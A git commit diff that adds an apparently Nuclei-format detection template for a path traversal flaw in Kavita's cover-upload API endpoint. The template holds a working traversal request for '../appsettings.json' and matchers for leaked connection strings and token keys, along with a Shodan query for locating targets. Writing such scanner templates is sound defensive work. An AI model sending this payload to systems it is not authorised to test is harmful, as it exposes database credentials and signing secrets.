Merge pull request #5081 from arafatansari/patch-51

Create kavita-lfi.yaml
2022-08-12 16:33:40 -07:00 · 2022-08-12 16:33:40 -07:00 · 3b5c473606
parent d9f7203607 000c7c42d6
commit 3b5c473606
1 changed files with 33 additions and 0 deletions
--- a/vulnerabilities/other/kavita-lfi.yaml
+++ b/vulnerabilities/other/kavita-lfi.yaml
@ -0,0 +1,33 @@
+id: kavita-lfi
+
+info:
+  name: Kavita - Path Traversal
+  author: arafatansari
+  severity: medium
+  description: |
+    kareadita/kavita allows Path Traversal by abusing the filename parameter of the /api/image/cover-upload.
+  reference:
+    - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
+  metadata:
+    verified: true
+    shodan-query: http.html:"kavita"
+  tags: kavita,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"ConnectionStrings":'
+          - '"Path":'
+          - '"TokenKey":'
+        condition: and
+
+      - type: status
+        status:
+          - 200